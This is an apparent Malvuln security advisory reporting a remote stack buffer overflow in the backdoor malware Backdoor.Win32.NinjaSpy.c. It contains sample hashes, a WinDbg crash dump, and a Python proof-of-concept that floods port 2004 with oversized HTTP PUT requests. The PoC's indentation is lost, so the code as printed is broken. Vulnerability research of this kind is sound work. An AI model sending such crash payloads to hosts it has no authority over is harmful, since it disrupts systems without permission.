Backdoor.Win32.NinjaSpy.c Remote Stack Buffer Overflow

Backdoor.Win32.NinjaSpy.c suffers from a remote stack buffer overflow vulnerability. The specimen drops a DLL named "cmd.dll" under C:\WINDOWS\ which listens on both TCP ports 2003 and 2004. By sending consecutive HTTP PUT requests with large payloads of characters, we can cause buffer overflow.


MD5 | 8f5ab251df42addd482e25bdea7aa8d8

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/6eece319bc108576bd1f4a8364616264.txt
Contact: [email protected]
Media: twitter.com/malvuln

Threat: Backdoor.Win32.NinjaSpy.c
Vulnerability: Remote Stack Buffer Overflow
Description: The specimen drops a DLL named "cmd.dll" under C:\WINDOWS\ which listens on both TCP ports 2003 and 2004. By sending consecutive HTTP PUT requests with large payload of characters we can cause buffer overflow.

Type: PE32
MD5: 6eece319bc108576bd1f4a8364616264
Vuln ID: MVID-2021-0018
Dropped files: cmd.dll
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 01/08/2021

Memory Dump:
0:000> .ecxr
eax=41414141 ebx=41414141 ecx=03fe0ea2 edx=0019eb08 esi=0420986c edi=03fe0e9d
eip=00440f57 esp=0019eae0 ebp=0019eb18 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202
cmd+0x40f57:
00440f57 83bb8001000000 cmp dword ptr [ebx+180h],0 ds:002b:414142c1=????????

FAULTING_IP:
cmd+40f57
00440f57 83bb8001000000 cmp dword ptr [ebx+180h],0

EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00440f57 (cmd+0x00040f57)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 414142c1
Attempt to read from address 414142c1

PROCESS_NAME: cmd.dll

OVERLAPPED_MODULE: Address regions for 'jscript9' and 'resourcepolicyclient.dll' overlap

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1: 00000000

EXCEPTION_PARAMETER2: 414142c1

READ_ADDRESS: 414142c1

FOLLOWUP_IP:
cmd+40f57
00440f57 83bb8001000000 cmp dword ptr [ebx+180h],0

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG: 0

APPLICATION_VERIFIER_FLAGS: 0

FAULTING_THREAD: 000014f4

BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS: INVALID_POINTER_READ_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID: INVALID_POINTER_READ_FILL_PATTERN_41414141

LAST_CONTROL_TRANSFER: from 764ee0bb to 00440f57

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0019eb18 764ee0bb 00920602 00000046 00000000 cmd+0x40f57
0019eb44 764f8849 03fe0e9d 00920602 00000046 user32!_InternalCallWinProc+0x2b
0019eb68 764fb145 00000046 00000000 0019ed14 user32!InternalCallWinProc+0x20
0019ec38 764e8503 03fe0e9d 00000000 00000046 user32!UserCallWinProcCheckWow+0x1be
0019eca0 764dfbfa 02c1f600 00000000 00000046 user32!DispatchClientMessage+0x1b3
0019ece8 773d0bcd 0019ed04 00000038 0019ee20 user32!__fnINOUTLPWINDOWPOS+0x4a
0019ed38 76832eec 76521878 000f0a14 76521760 ntdll!KiUserCallbackDispatcher+0x4d
0019ed3c 76521878 000f0a14 76521760 0055060a win32u!NtUserSetFocus+0xc
0019ed5c 764ee0bb 0055060a 00000110 000f0a14 user32!MB_DlgProc+0x118
0019ed88 764f8849 76521760 0055060a 00000110 user32!_InternalCallWinProc+0x2b
0019edac 764fac8c 00000110 000f0a14 0019f3e8 user32!InternalCallWinProc+0x20
0019ee30 764dbf65 0055060a 00000110 000f0a14 user32!UserCallDlgProcCheckWow+0x10f
0019ee8c 764dbe45 02c49f90 00000000 00000110 user32!DefDlgProcWorker+0x115
0019eeac 764ee0bb 0055060a 00000110 000f0a14 user32!DefDlgProcW+0x25
0019eed8 764f8849 764dbe20 0055060a 00000110 user32!_InternalCallWinProc+0x2b
0019eefc 764fb145 00000110 000f0a14 0019f3e8 user32!InternalCallWinProc+0x20
0019efcc 764fa89c 7a4afc30 00007ffe 00000110 user32!UserCallWinProcCheckWow+0x1be
0019f038 76505b67 02c49f90 00000000 0019f3e8 user32!SendMessageWorker+0x6ff
0019f154 76506533 764d0000 0267a708 00000000 user32!InternalCreateDialog+0x1137
0019f198 7654043b 00e80416 76521760 0019f3e8 user32!InternalDialogBox+0xc8
0019f264 768339ec 0019f3d0 76522093 0019f3e8 user32!SoftModalMessageBox+0x72b
0019f26c 76522093 0019f3e8 07c43d40 00000000 win32u!NtUserModifyUserStartupInfoFlags+0xc
0019f4ac 0045a743 00e80416 04229764 041f562c user32!MessageBoxWorker+0x29a
0019f530 0045a85a 00000010 0019fd34 0045a87b cmd+0x5a743
0019f658 0045a63f 00000000 004aa4e0 0045e01d cmd+0x5a85a
0019fd50 00420446 00000401 0000036c 00000008 cmd+0x5a63f
0019fd68 764ee0bb 005b0464 00000401 0000036c cmd+0x20446
0019fd94 764f8849 03fe0f05 005b0464 00000401 user32!_InternalCallWinProc+0x2b
0019fdb8 764fb145 00000401 0000036c 00000008 user32!InternalCallWinProc+0x20
0019fe88 764e90dc 03fe0f05 00000000 00000401 user32!UserCallWinProcCheckWow+0x1be
0019fef4 764e38c0 0019ff68 0045a30c 0019ff1c user32!DispatchMessageWorker+0x4ac
0019fefc 0045a30c 0019ff1c 0019ff00 004ce046 user32!DispatchMessageA+0x10
0019ff68 004a992c e046004c 0019ffcc 00404498 cmd+0x5a30c
0019ff80 76e38654 002d2000 76e38630 6a961c86 cmd+0xa992c
0019ff94 773c4a77 002d2000 8aaf072f 00000000 kernel32!BaseThreadInitThunk+0x24
0019ffdc 773c4a47 ffffffff 773e9eda 00000000 ntdll!__RtlUserThreadStart+0x2f
0019ffec 00000000 004ce046 002d2000 00000000 ntdll!_RtlUserThreadStart+0x1b


STACK_COMMAND: ~0s; .ecxr ; kb

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: cmd+40f57

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: cmd

IMAGE_NAME: cmd.dll

DEBUG_FLR_IMAGE_TIMESTAMP: 2a425e19

FAILURE_BUCKET_ID: INVALID_POINTER_READ_FILL_PATTERN_41414141_c0000005_cmd.dll!Unknown

BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_41414141_cmd+40f57


Exploit/PoC:
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=2004
c=1
JUNK="A"*8601
AMT=10
PAYLOAD = "PUT /"+JUNK+" HTTP/1.0 Content-Type: application/x-www-form-urlencoded Content-Length: dkKoybHost: 35409\r\n"+ "Accept-Charset: "+JUNK

def doit():
global c, JUNK, PAYLOAD, AMT
while True:
s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))
s.send(PAYLOAD)
s.close()
c+=1
if c==AMT:
print("Backdoor.Win32.NinjaSpy.c / Remote Stack Buffer Overflow")
print("MD5: 6eece319bc108576bd1f4a8364616264")
print("By Malvuln")
exit()

if __name__=="__main__":
doit()



Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Related Posts